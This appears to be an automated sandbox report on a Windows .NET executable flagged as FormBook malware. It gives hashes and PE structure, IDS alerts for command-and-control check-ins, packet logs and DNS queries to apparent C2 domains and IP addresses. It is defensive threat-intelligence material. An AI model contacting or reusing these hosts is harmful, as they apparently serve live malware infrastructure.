Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.806039795276499
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	1.exe
File size:	750'592 bytes
MD5:	60ff6dcfe9ed4741b4ffb91cd3bd6895
SHA1:	89bec9456328957250b9ec8b30ec87495ab1a2e1
SHA256:	6d923f02c2252e4a2ea98a8685fc5237354e2853791855f1a451a390dd85cbb9
SHA512:	e8621aa3346c9fe7438ba383a8e77c1cad73cf79e91b13f93688422317846a58de0b5f6cce859b924829c8aa77c3a0ac0822cc23a93166b31b3fc53141f5bea4
SSDEEP:	12288:qhOgu0A2s2qPVGNbTuMuKBD7hpvAOezBmEjpvbNOuopsfqH2YGJL7bWz:qbuFPST0sDd1ezBmEFTgsf6hG57bWz
TLSH:	67F4B52799A437F4FA3E7BBCB16832405EED56839F03CA5868B309C90716B51C5E0BB5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............P..T..........Vf... ........@.. ....................................@................................

File Icon


Icon Hash:	072345e4e4278365

Static PE Info

General

Entrypoint:	0x4a6656
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5FC6EC84 [Wed Dec 2 01:23:16 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push es
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [05000000h], al
add byte ptr [eax], al
add byte ptr [05000000h], al
add byte ptr [eax], al
add byte ptr [edx], al
add byte ptr [eax], al
add bh, bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa6604	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa8000	0x11b78	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xba000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa52a4	0xa5400	False	0.6558067795007564	data	6.8175261260266655	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa8000	0x11b78	0x11c00	False	0.08867462588028169	data	4.317306363923702	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xba000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xa8130	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.06428191174730864
RT_GROUP_ICON	0xb8958	0x14	data	1.0
RT_VERSION	0xb896c	0x42c	data	0.4363295880149813
RT_MANIFEST	0xb8d98	0xde0	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.3865427927927928

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.534.149.87.4549725802031412 11/21/23-03:33:45.473798	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49725	80	192.168.2.5	34.149.87.45
192.168.2.5167.172.69.4049719802031412 11/21/23-03:32:02.056719	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49719	80	192.168.2.5	167.172.69.40
192.168.2.523.227.38.7449718802031412 11/21/23-03:31:50.310124	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49718	80	192.168.2.5	23.227.38.74
192.168.2.534.149.87.4549713802031412 11/21/23-03:30:48.646835	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49713	80	192.168.2.5	34.149.87.45
192.168.2.523.227.38.7449723802031412 11/21/23-03:33:19.042134	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49723	80	192.168.2.5	23.227.38.74
192.168.2.5217.160.0.16749715802031412 11/21/23-03:31:13.651241	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49715	80	192.168.2.5	217.160.0.167
192.168.2.523.227.38.7449722802031412 11/21/23-03:32:47.926567	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49722	80	192.168.2.5	23.227.38.74
192.168.2.5167.172.69.4049712802031412 11/21/23-03:30:32.559422	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49712	80	192.168.2.5	167.172.69.40
192.168.2.534.149.87.4549720802031412 11/21/23-03:32:18.840591	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49720	80	192.168.2.5	34.149.87.45
192.168.2.5217.160.0.16749721802031412 11/21/23-03:32:42.602914	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49721	80	192.168.2.5	217.160.0.167
192.168.2.5167.172.69.4049724802031412 11/21/23-03:33:29.744408	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49724	80	192.168.2.5	167.172.69.40
192.168.2.523.227.38.7449716802031412 11/21/23-03:31:19.303012	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49716	80	192.168.2.5	23.227.38.74
192.168.2.5217.160.0.16749726802031412 11/21/23-03:34:08.968993	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49726	80	192.168.2.5	217.160.0.167

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2023 03:30:32.158839941 CET	49712	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:30:32.559043884 CET	80	49712	167.172.69.40	192.168.2.5
Nov 21, 2023 03:30:32.559238911 CET	49712	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:30:32.559422016 CET	49712	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:30:32.958933115 CET	80	49712	167.172.69.40	192.168.2.5
Nov 21, 2023 03:30:32.959043980 CET	80	49712	167.172.69.40	192.168.2.5
Nov 21, 2023 03:30:32.959058046 CET	80	49712	167.172.69.40	192.168.2.5
Nov 21, 2023 03:30:32.959069014 CET	80	49712	167.172.69.40	192.168.2.5
Nov 21, 2023 03:30:32.959153891 CET	49712	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:30:32.959212065 CET	49712	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:30:32.968388081 CET	49712	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:30:33.367908955 CET	80	49712	167.172.69.40	192.168.2.5
Nov 21, 2023 03:30:48.551273108 CET	49713	80	192.168.2.5	34.149.87.45
Nov 21, 2023 03:30:48.646498919 CET	80	49713	34.149.87.45	192.168.2.5
Nov 21, 2023 03:30:48.646689892 CET	49713	80	192.168.2.5	34.149.87.45
Nov 21, 2023 03:30:48.646835089 CET	49713	80	192.168.2.5	34.149.87.45
Nov 21, 2023 03:30:48.741797924 CET	80	49713	34.149.87.45	192.168.2.5
Nov 21, 2023 03:30:48.754308939 CET	80	49713	34.149.87.45	192.168.2.5
Nov 21, 2023 03:30:48.754475117 CET	80	49713	34.149.87.45	192.168.2.5
Nov 21, 2023 03:30:48.754497051 CET	49713	80	192.168.2.5	34.149.87.45
Nov 21, 2023 03:30:48.754529953 CET	49713	80	192.168.2.5	34.149.87.45
Nov 21, 2023 03:30:48.849591017 CET	80	49713	34.149.87.45	192.168.2.5
Nov 21, 2023 03:31:13.453527927 CET	49715	80	192.168.2.5	217.160.0.167
Nov 21, 2023 03:31:13.650980949 CET	80	49715	217.160.0.167	192.168.2.5
Nov 21, 2023 03:31:13.651124954 CET	49715	80	192.168.2.5	217.160.0.167
Nov 21, 2023 03:31:13.651241064 CET	49715	80	192.168.2.5	217.160.0.167
Nov 21, 2023 03:31:13.848320961 CET	80	49715	217.160.0.167	192.168.2.5
Nov 21, 2023 03:31:13.851768017 CET	80	49715	217.160.0.167	192.168.2.5
Nov 21, 2023 03:31:13.851792097 CET	80	49715	217.160.0.167	192.168.2.5
Nov 21, 2023 03:31:13.851924896 CET	49715	80	192.168.2.5	217.160.0.167
Nov 21, 2023 03:31:13.851995945 CET	49715	80	192.168.2.5	217.160.0.167
Nov 21, 2023 03:31:14.048691988 CET	80	49715	217.160.0.167	192.168.2.5
Nov 21, 2023 03:31:19.177664995 CET	49716	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:31:19.302802086 CET	80	49716	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:19.302867889 CET	49716	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:31:19.303011894 CET	49716	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:31:19.428778887 CET	80	49716	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:19.463684082 CET	80	49716	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:19.463700056 CET	80	49716	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:19.463712931 CET	80	49716	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:19.463727951 CET	80	49716	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:19.463741064 CET	80	49716	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:19.463759899 CET	49716	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:31:19.463855982 CET	80	49716	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:19.463923931 CET	49716	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:31:19.463923931 CET	49716	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:31:19.463923931 CET	49716	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:31:19.589119911 CET	80	49716	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:50.185362101 CET	49718	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:31:50.309914112 CET	80	49718	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:50.310040951 CET	49718	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:31:50.310123920 CET	49718	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:31:50.434468985 CET	80	49718	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:50.441792011 CET	80	49718	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:50.441823959 CET	80	49718	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:50.441837072 CET	80	49718	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:50.441848040 CET	80	49718	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:50.441859007 CET	80	49718	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:50.442114115 CET	49718	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:31:50.442114115 CET	49718	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:31:50.442281008 CET	49718	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:31:50.442926884 CET	80	49718	23.227.38.74	192.168.2.5
Nov 21, 2023 03:31:50.443002939 CET	49718	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:32:01.637867928 CET	49719	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:32:02.056256056 CET	80	49719	167.172.69.40	192.168.2.5
Nov 21, 2023 03:32:02.056385994 CET	49719	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:32:02.056719065 CET	49719	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:32:02.474730968 CET	80	49719	167.172.69.40	192.168.2.5
Nov 21, 2023 03:32:02.474802017 CET	80	49719	167.172.69.40	192.168.2.5
Nov 21, 2023 03:32:02.474838972 CET	80	49719	167.172.69.40	192.168.2.5
Nov 21, 2023 03:32:02.474889040 CET	80	49719	167.172.69.40	192.168.2.5
Nov 21, 2023 03:32:02.474901915 CET	49719	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:32:02.474939108 CET	49719	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:32:02.474970102 CET	49719	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:32:03.550206900 CET	49719	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:32:03.968430042 CET	80	49719	167.172.69.40	192.168.2.5
Nov 21, 2023 03:32:17.769251108 CET	49720	80	192.168.2.5	34.149.87.45
Nov 21, 2023 03:32:17.864610910 CET	80	49720	34.149.87.45	192.168.2.5
Nov 21, 2023 03:32:17.864886045 CET	49720	80	192.168.2.5	34.149.87.45
Nov 21, 2023 03:32:18.840590954 CET	49720	80	192.168.2.5	34.149.87.45
Nov 21, 2023 03:32:18.935919046 CET	80	49720	34.149.87.45	192.168.2.5
Nov 21, 2023 03:32:18.947756052 CET	80	49720	34.149.87.45	192.168.2.5
Nov 21, 2023 03:32:18.947770119 CET	80	49720	34.149.87.45	192.168.2.5
Nov 21, 2023 03:32:18.947858095 CET	49720	80	192.168.2.5	34.149.87.45
Nov 21, 2023 03:32:18.983649015 CET	49720	80	192.168.2.5	34.149.87.45
Nov 21, 2023 03:32:19.078787088 CET	80	49720	34.149.87.45	192.168.2.5
Nov 21, 2023 03:32:42.409904003 CET	49721	80	192.168.2.5	217.160.0.167
Nov 21, 2023 03:32:42.602727890 CET	80	49721	217.160.0.167	192.168.2.5
Nov 21, 2023 03:32:42.602812052 CET	49721	80	192.168.2.5	217.160.0.167
Nov 21, 2023 03:32:42.602914095 CET	49721	80	192.168.2.5	217.160.0.167
Nov 21, 2023 03:32:42.795522928 CET	80	49721	217.160.0.167	192.168.2.5
Nov 21, 2023 03:32:42.798127890 CET	80	49721	217.160.0.167	192.168.2.5
Nov 21, 2023 03:32:42.798140049 CET	80	49721	217.160.0.167	192.168.2.5
Nov 21, 2023 03:32:42.798252106 CET	49721	80	192.168.2.5	217.160.0.167
Nov 21, 2023 03:32:42.798342943 CET	49721	80	192.168.2.5	217.160.0.167
Nov 21, 2023 03:32:42.990905046 CET	80	49721	217.160.0.167	192.168.2.5
Nov 21, 2023 03:32:47.800623894 CET	49722	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:32:47.926384926 CET	80	49722	23.227.38.74	192.168.2.5
Nov 21, 2023 03:32:47.926485062 CET	49722	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:32:47.926567078 CET	49722	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:32:48.052409887 CET	80	49722	23.227.38.74	192.168.2.5
Nov 21, 2023 03:32:48.063898087 CET	80	49722	23.227.38.74	192.168.2.5
Nov 21, 2023 03:32:48.063942909 CET	80	49722	23.227.38.74	192.168.2.5
Nov 21, 2023 03:32:48.063981056 CET	80	49722	23.227.38.74	192.168.2.5
Nov 21, 2023 03:32:48.064026117 CET	49722	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:32:48.064034939 CET	80	49722	23.227.38.74	192.168.2.5
Nov 21, 2023 03:32:48.064069986 CET	80	49722	23.227.38.74	192.168.2.5
Nov 21, 2023 03:32:48.064096928 CET	49722	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:32:48.064096928 CET	49722	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:32:48.064130068 CET	49722	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:32:48.064713955 CET	80	49722	23.227.38.74	192.168.2.5
Nov 21, 2023 03:32:48.064762115 CET	49722	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:33:18.909879923 CET	49723	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:33:19.037645102 CET	80	49723	23.227.38.74	192.168.2.5
Nov 21, 2023 03:33:19.037902117 CET	49723	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:33:19.042134047 CET	49723	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:33:19.167977095 CET	80	49723	23.227.38.74	192.168.2.5
Nov 21, 2023 03:33:19.183007002 CET	80	49723	23.227.38.74	192.168.2.5
Nov 21, 2023 03:33:19.183046103 CET	80	49723	23.227.38.74	192.168.2.5
Nov 21, 2023 03:33:19.183083057 CET	80	49723	23.227.38.74	192.168.2.5
Nov 21, 2023 03:33:19.183118105 CET	80	49723	23.227.38.74	192.168.2.5
Nov 21, 2023 03:33:19.183171034 CET	80	49723	23.227.38.74	192.168.2.5
Nov 21, 2023 03:33:19.183239937 CET	49723	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:33:19.183465958 CET	80	49723	23.227.38.74	192.168.2.5
Nov 21, 2023 03:33:19.183559895 CET	49723	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:33:19.183559895 CET	49723	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:33:19.183559895 CET	49723	80	192.168.2.5	23.227.38.74
Nov 21, 2023 03:33:19.309298038 CET	80	49723	23.227.38.74	192.168.2.5
Nov 21, 2023 03:33:29.394826889 CET	49724	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:33:29.744005919 CET	80	49724	167.172.69.40	192.168.2.5
Nov 21, 2023 03:33:29.744189978 CET	49724	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:33:29.744407892 CET	49724	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:33:30.093384027 CET	80	49724	167.172.69.40	192.168.2.5
Nov 21, 2023 03:33:30.093447924 CET	80	49724	167.172.69.40	192.168.2.5
Nov 21, 2023 03:33:30.093483925 CET	80	49724	167.172.69.40	192.168.2.5
Nov 21, 2023 03:33:30.093517065 CET	80	49724	167.172.69.40	192.168.2.5
Nov 21, 2023 03:33:30.093561888 CET	49724	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:33:30.093595982 CET	49724	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:33:30.094110012 CET	49724	80	192.168.2.5	167.172.69.40
Nov 21, 2023 03:33:30.442565918 CET	80	49724	167.172.69.40	192.168.2.5
Nov 21, 2023 03:33:45.378653049 CET	49725	80	192.168.2.5	34.149.87.45
Nov 21, 2023 03:33:45.473601103 CET	80	49725	34.149.87.45	192.168.2.5
Nov 21, 2023 03:33:45.473798037 CET	49725	80	192.168.2.5	34.149.87.45
Nov 21, 2023 03:33:45.473798037 CET	49725	80	192.168.2.5	34.149.87.45
Nov 21, 2023 03:33:45.568799973 CET	80	49725	34.149.87.45	192.168.2.5
Nov 21, 2023 03:33:45.581517935 CET	80	49725	34.149.87.45	192.168.2.5
Nov 21, 2023 03:33:45.581615925 CET	80	49725	34.149.87.45	192.168.2.5
Nov 21, 2023 03:33:45.581679106 CET	49725	80	192.168.2.5	34.149.87.45
Nov 21, 2023 03:33:45.676539898 CET	80	49725	34.149.87.45	192.168.2.5
Nov 21, 2023 03:34:08.768873930 CET	49726	80	192.168.2.5	217.160.0.167
Nov 21, 2023 03:34:08.966284037 CET	80	49726	217.160.0.167	192.168.2.5
Nov 21, 2023 03:34:08.968894958 CET	49726	80	192.168.2.5	217.160.0.167
Nov 21, 2023 03:34:08.968992949 CET	49726	80	192.168.2.5	217.160.0.167
Nov 21, 2023 03:34:09.165927887 CET	80	49726	217.160.0.167	192.168.2.5
Nov 21, 2023 03:34:09.171339989 CET	80	49726	217.160.0.167	192.168.2.5
Nov 21, 2023 03:34:09.171363115 CET	80	49726	217.160.0.167	192.168.2.5
Nov 21, 2023 03:34:09.171547890 CET	49726	80	192.168.2.5	217.160.0.167
Nov 21, 2023 03:34:09.171663046 CET	49726	80	192.168.2.5	217.160.0.167
Nov 21, 2023 03:34:09.368339062 CET	80	49726	217.160.0.167	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2023 03:30:26.817544937 CET	57008	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:30:26.945291042 CET	53	57008	1.1.1.1	192.168.2.5
Nov 21, 2023 03:30:31.957345963 CET	60664	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:30:32.157609940 CET	53	60664	1.1.1.1	192.168.2.5
Nov 21, 2023 03:30:37.972877979 CET	51484	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:30:38.169940948 CET	53	51484	1.1.1.1	192.168.2.5
Nov 21, 2023 03:30:43.176194906 CET	50805	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:30:43.378720045 CET	53	50805	1.1.1.1	192.168.2.5
Nov 21, 2023 03:30:48.394839048 CET	62826	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:30:48.550123930 CET	53	62826	1.1.1.1	192.168.2.5
Nov 21, 2023 03:30:53.771246910 CET	60842	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:30:53.960808039 CET	53	60842	1.1.1.1	192.168.2.5
Nov 21, 2023 03:30:59.989058971 CET	60154	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:31:00.118714094 CET	53	60154	1.1.1.1	192.168.2.5
Nov 21, 2023 03:31:05.129239082 CET	61585	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:31:06.128673077 CET	61585	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:31:07.144340038 CET	61585	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:31:08.266380072 CET	53	61585	1.1.1.1	192.168.2.5
Nov 21, 2023 03:31:08.266397953 CET	53	61585	1.1.1.1	192.168.2.5
Nov 21, 2023 03:31:08.266410112 CET	53	61585	1.1.1.1	192.168.2.5
Nov 21, 2023 03:31:13.270008087 CET	49681	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:31:13.452677965 CET	53	49681	1.1.1.1	192.168.2.5
Nov 21, 2023 03:31:18.864690065 CET	65189	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:31:19.176352024 CET	53	65189	1.1.1.1	192.168.2.5
Nov 21, 2023 03:31:24.472753048 CET	63523	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:31:24.601448059 CET	53	63523	1.1.1.1	192.168.2.5
Nov 21, 2023 03:31:29.613903999 CET	52539	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:31:29.742202044 CET	53	52539	1.1.1.1	192.168.2.5
Nov 21, 2023 03:31:39.770761967 CET	52609	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:31:39.900440931 CET	53	52609	1.1.1.1	192.168.2.5
Nov 21, 2023 03:31:44.910270929 CET	53088	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:31:45.039093971 CET	53	53088	1.1.1.1	192.168.2.5
Nov 21, 2023 03:31:50.050924063 CET	59600	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:31:50.183708906 CET	53	59600	1.1.1.1	192.168.2.5
Nov 21, 2023 03:31:55.457015038 CET	61217	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:31:55.758850098 CET	53	61217	1.1.1.1	192.168.2.5
Nov 21, 2023 03:32:07.488229036 CET	55214	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:32:07.616873026 CET	53	55214	1.1.1.1	192.168.2.5
Nov 21, 2023 03:32:12.628865004 CET	50015	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:32:12.756762981 CET	53	50015	1.1.1.1	192.168.2.5
Nov 21, 2023 03:32:23.988194942 CET	52664	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:32:24.116934061 CET	53	52664	1.1.1.1	192.168.2.5
Nov 21, 2023 03:32:29.128865004 CET	53983	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:32:29.258497953 CET	53	53983	1.1.1.1	192.168.2.5
Nov 21, 2023 03:32:34.270065069 CET	51235	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:32:35.286025047 CET	51235	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:32:36.300199986 CET	51235	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:32:37.406968117 CET	53	51235	1.1.1.1	192.168.2.5
Nov 21, 2023 03:32:37.406986952 CET	53	51235	1.1.1.1	192.168.2.5
Nov 21, 2023 03:32:37.406996965 CET	53	51235	1.1.1.1	192.168.2.5
Nov 21, 2023 03:32:53.066355944 CET	64808	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:32:53.397983074 CET	53	64808	1.1.1.1	192.168.2.5
Nov 21, 2023 03:32:58.410080910 CET	62765	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:32:58.538961887 CET	53	62765	1.1.1.1	192.168.2.5
Nov 21, 2023 03:33:08.566287994 CET	60885	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:33:08.694789886 CET	53	60885	1.1.1.1	192.168.2.5
Nov 21, 2023 03:33:13.707262993 CET	58551	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:33:13.908140898 CET	53	58551	1.1.1.1	192.168.2.5
Nov 21, 2023 03:33:24.191023111 CET	56247	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:33:24.378483057 CET	53	56247	1.1.1.1	192.168.2.5
Nov 21, 2023 03:33:35.098356962 CET	55596	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:33:35.227684021 CET	53	55596	1.1.1.1	192.168.2.5
Nov 21, 2023 03:33:40.238239050 CET	60738	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:33:40.367223024 CET	53	60738	1.1.1.1	192.168.2.5
Nov 21, 2023 03:33:50.597524881 CET	54375	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:33:50.726401091 CET	53	54375	1.1.1.1	192.168.2.5
Nov 21, 2023 03:33:55.935547113 CET	52338	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:33:56.125416040 CET	53	52338	1.1.1.1	192.168.2.5
Nov 21, 2023 03:34:01.129173040 CET	63678	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:34:02.144475937 CET	63678	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:34:03.160154104 CET	63678	53	192.168.2.5	1.1.1.1
Nov 21, 2023 03:34:03.764373064 CET	53	63678	1.1.1.1	192.168.2.5
Nov 21, 2023 03:34:03.764391899 CET	53	63678	1.1.1.1	192.168.2.5
Nov 21, 2023 03:34:03.764404058 CET	53	63678	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 21, 2023 03:30:26.817544937 CET	192.168.2.5	1.1.1.1	0xd5ca	Standard query (0)	www.revistabrasileiramarketing.info	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:30:31.957345963 CET	192.168.2.5	1.1.1.1	0xe30c	Standard query (0)	www.lactationdrink.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:30:37.972877979 CET	192.168.2.5	1.1.1.1	0x6a35	Standard query (0)	www.wisdomtoothguru.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:30:43.176194906 CET	192.168.2.5	1.1.1.1	0x9d8c	Standard query (0)	www.successwithyolandafgreen.com	A (IP address)	IN (0x0001)	false
Nov 21, 2023 03:30:48.394839048 CET	192.168.2.5	1.1.1.1	0xd460	Standard query (0)	www.lbarco.com	A (IP address)	IN (0x0001)	false
